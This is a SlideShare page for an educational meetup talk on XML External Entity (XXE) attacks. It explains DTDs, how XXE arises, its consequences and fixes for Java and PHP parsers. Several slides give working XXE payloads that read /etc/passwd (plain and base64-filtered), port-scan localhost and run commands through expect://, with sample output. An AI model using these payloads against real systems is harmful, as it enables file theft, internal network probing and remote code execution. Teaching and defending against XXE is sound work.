Download to read offline
![• Common references shared between multiple XML documents
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM
"http://www.xmlwriter.net/copyright.xml"> ]>
<copyright>&c;</copyright>
Why External Entities?
• Security issues arise because PHP places no restrictions on what URLs can
be accessed, even if allow_url_fopen is set to false in php.ini](https://image.slidesharecdn.com/xmlexternalentitynullmeet19316-230415051017-4f46f040/75/XML-External-Entity-Null-Meet-19_3_16-pptx-4-2048.jpg)
![File inclusion
• local file must be valid XML
• What if it is not?
• It is possible to encode binary files as a Base64 encoded string
• What if the confidential file is not reflected in the response?
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan>
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
Back
DEMO](https://image.slidesharecdn.com/xmlexternalentitynullmeet19316-230415051017-4f46f040/75/XML-External-Entity-Null-Meet-19_3_16-pptx-7-2048.jpg)
![Port Scanning
• It is possible to specify ports to which the XML parser will connect
• As long as PHP error messages are enabled you get back the banner of the service
running even if the port doesn't support the HTTP protocol
• What if error messages are disabled?
Time is your friend!
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed!
SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
Back](https://image.slidesharecdn.com/xmlexternalentitynullmeet19316-230415051017-4f46f040/75/XML-External-Entity-Null-Meet-19_3_16-pptx-9-2048.jpg)
![Remote Code Execution
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>
faultString</name><value>
<string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data)
" does not exist</string>
</value></member></struct></value></fault></methodResponse>
Request:
Response:
Back](https://image.slidesharecdn.com/xmlexternalentitynullmeet19316-230415051017-4f46f040/75/XML-External-Entity-Null-Meet-19_3_16-pptx-11-2048.jpg)
![Xml external entities [xxe]](https://cdn.slidesharecdn.com/ss_thumbnails/xmlexternalentitiesxxe-150514141054-lva1-app6891-thumbnail.jpg?width=640&height=640&fit=bounds)
![[Blackhat2015] FileCry attack against Java](https://cdn.slidesharecdn.com/ss_thumbnails/us-15-wang-filecry-the-new-age-of-xxe-java-wp-150807171804-lva1-app6892-thumbnail.jpg?width=640&height=640&fit=bounds)
![[Bucharest] XML Based Attacks](https://cdn.slidesharecdn.com/ss_thumbnails/xmlbasedattacks-owasp-151026104617-lva1-app6892-thumbnail.jpg?width=640&height=640&fit=bounds)
XML External Entity Null Meet 19_3_16.pptx
- 1. XML eXternal EntityAttack (XXE) By: Samit Anwer samit.anwer@gmail.com and other related attacks
- 2. Agenda • Document TypeDefinition • Prerequisites to perform an XXE attack • Outcomes • Fixing XXE vulnerabilities
- 3. Document Type Definition(DTD) Internal DTD External DTD DTD defines the structure - legal elements, entities and attributes of an XML doc
- 4. • Common referencesshared between multiple XML documents <?xml version="1.0" standalone="no" ?> <!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]> <copyright>&c;</copyright> Why External Entities? • Security issues arise because PHP places no restrictions on what URLs can be accessed, even if allow_url_fopen is set to false in php.ini
- 5. Prerequisites to performan XXE • The application parses XML documents • Tainted data is allowed within the system identifier of the entity, within the DTD • The XML processor is configured to validate and process the DTD • The XML processor is configured to resolve external entities within the DTD
- 6. • Disclosure ofconfidential data / file inclusion • Server Side Request Forgery (SSRF) • Port Scanning • DoS on the parsing system • Remote Code Execution Outcomes
- 7. File inclusion • localfile must be valid XML • What if it is not? • It is possible to encode binary files as a Base64 encoded string • What if the confidential file is not reflected in the response? <!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan> <!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> <scan>&test;</scan> Back DEMO
- 8. SSRF • an attackerhas the ability to create requests from the vulnerable server Back DEMO Go to Appendix
- 9. Port Scanning • Itis possible to specify ports to which the XML parser will connect • As long as PHP error messages are enabled you get back the banner of the service running even if the port doesn't support the HTTP protocol • What if error messages are disabled? Time is your friend! <!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]> <scan>&test;</scan> Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10 Back
- 10. DoS • Billion laughsattack • Try opening file:///dev/random https://en.wikipedia.org/wiki/Billion_laughs Back
- 11. Remote Code Execution <!DOCTYPEroot [<!ENTITY foo SYSTEM "expect://id">]> <methodCall> <methodName>&foo;</methodName> </methodCall> <?xml version="1.0" encoding="UTF-8"?> <methodResponse> <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name> faultString</name><value> <string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data) " does not exist</string> </value></member></struct></value></fault></methodResponse> Request: Response: Back
- 12. Fixes – JAVA •Disable DTDs • If it is not possible to disable DTDs completely, then • Disable external entity • Disable external DTDs factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities" , false); factory.setFeature(“http://apache.org/xml/features/nonvalidating/load-external-dtd” , false);
- 13. Fixes - PHP •libxml_disable_entity_loader(true); • Refer - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Chea t_Sheet#PHP Fixes – iOS, .NET, C/C++
- 14. References • DTD tutorial http://edutechwiki.unige.ch/en/DTD_tutorial •XML External Entity (XXE) Processing https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing • XML External Entity (XXE) Prevention Cheat Sheet https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP • Scanning the internal network using SimpleXML http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html • Identifying Xml eXternal Entity vulnerability (XXE) https://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
- 15.
- 16.
Editor's Notes
- #2 An XML External Entity attack is a type of attack against an application that parses XML input This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser
- #4 The system identifier is assumed to be a URI that can be dereferenced by the XML processor when processing the entity XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information
- #12 This extension allows to interact with processes through PTY.